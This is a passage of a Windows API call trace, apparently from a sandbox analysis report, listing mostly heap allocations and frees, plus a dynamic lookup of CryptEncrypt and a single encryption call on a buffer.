RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0186.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0186.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4323) returned 0x2f34cd8 [0186.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4323) returned 0x2f39008 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f34cd8 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f39008 | out: hHeap=0x970000) returned 1 [0186.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0186.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.058] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0186.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0186.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0186.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0186.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0186.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0186.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0186.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0186.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0186.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4323) returned 0x2f34cd8 [0186.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f34cd8 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0186.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0186.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0186.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0186.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0186.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0186.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0186.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0186.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50cb0 [0186.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50cb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0186.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.101] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0186.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543c8 [0186.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0186.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0186.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0186.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0186.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0186.102] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f309a8*, pdwDataLen=0x8cef60*=0x4323, dwBufLen=0x4328 | out: pbData=0x2f309a8*, pdwDataLen=0x8cef60*=0x4328) returned 1 [0186.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0186.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0186.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0186.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.104] RtlAllocateHeap 